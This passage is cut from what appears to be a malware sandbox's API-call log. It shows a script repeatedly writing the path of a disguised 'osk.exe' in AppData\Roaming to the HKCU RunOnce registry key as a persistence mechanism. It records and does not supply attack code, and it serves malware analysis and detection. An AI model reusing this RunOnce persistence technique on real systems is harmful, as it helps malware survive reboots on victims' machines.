pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.490] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3e [0079.490] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.490] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.490] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.490] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.490] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.490] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.490] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.490] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 
lpUsedDefaultChar=0x0) returned 54 [0079.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.490] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.490] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.491] RegCloseKey (hKey=0x280) returned 0x0 [0079.491] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.491] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.491] SetTimer (hWnd=0x20280, nIDEvent=0x203e, uElapse=0xa, lpTimerFunc=0x0) returned 0x203e [0079.491] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.503] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.503] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.503] KillTimer (hWnd=0x20280, uIDEvent=0x203e) returned 1 [0079.503] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.503] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.504] IUnknown:Release (This=0x787518) returned 0x1 [0079.504] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) 
returned 0x0 [0079.504] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.504] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.504] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.504] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.504] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.504] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, 
[7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.504] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.504] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.504] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3f [0079.504] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.504] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x40 [0079.504] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, 
pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.505] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3f [0079.505] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.505] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.505] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.505] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.505] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.505] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.505] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.505] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.506] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.506] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.506] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.506] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.506] RegCloseKey (hKey=0x280) returned 0x0 [0079.506] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.506] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.506] SetTimer (hWnd=0x20280, nIDEvent=0x203f, uElapse=0xa, lpTimerFunc=0x0) returned 0x203f [0079.506] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.519] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.519] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.519] KillTimer (hWnd=0x20280, uIDEvent=0x203f) returned 1 [0079.519] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.519] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.519] IUnknown:Release (This=0x787518) returned 0x1 [0079.519] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.519] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.519] FileSystemObject:IDispatch:Invoke (in: 
This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.520] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.520] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.520] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.520] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.520] FileSystemObject:IUnknown:QueryInterface (in: 
This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.520] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.520] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x40 [0079.520] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.520] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x41 [0079.520] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.521] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x40 
[0079.521] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.521] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.521] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.521] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.521] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.521] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.521] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.521] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.521] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.522] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.522] RegCloseKey (hKey=0x280) returned 0x0 [0079.522] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.522] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.522] SetTimer (hWnd=0x20280, nIDEvent=0x2040, uElapse=0xa, lpTimerFunc=0x0) returned 0x2040 [0079.522] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.535] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.535] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.535] KillTimer (hWnd=0x20280, uIDEvent=0x2040) returned 1 [0079.535] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.535] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.535] IUnknown:Release (This=0x787518) returned 0x1 [0079.535] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.535] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.536] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, 
[5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.536] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.536] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.536] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.536] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.536] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, 
[5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.536] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.536] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x41 [0079.536] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.536] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x42 [0079.536] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, 